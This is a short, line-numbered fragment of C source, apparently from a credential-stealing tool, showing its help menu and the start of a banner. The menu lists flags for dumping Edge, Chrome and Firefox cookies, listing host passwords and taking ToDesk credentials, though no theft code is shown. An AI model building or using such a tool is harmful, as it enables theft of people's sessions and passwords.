| 15 | wprintf(Message); |
| 16 | } |
| 17 | void usage() { |
| 18 | printf("\nFlags:\n"); |
| 19 | printf(" /edge Get the cookies for the current host\n"); |
| 20 | printf(" /pass Lists all host passwords\n"); |
| 21 | printf(" /chrome Get the cookies for the current host\n"); |
| 22 | printf(" /firefox Get the cookies for the current host\n"); |
| 23 | printf(" /todesk Get the credentials for the current host\n"); |
| 24 | printf(" /list list all hosts\n"); |
| 25 | printf(" /pass Lists all host passwords\n"); |
| 26 | printf(" /help Maybe you need help\n"); |
| 27 | } |
| 28 | void banner() { |
| 29 | printf(" _____ _ _ _ _ _ __ \n"); |
| 30 | printf(" / ____| | | | | | | | | |/ _|\n"); |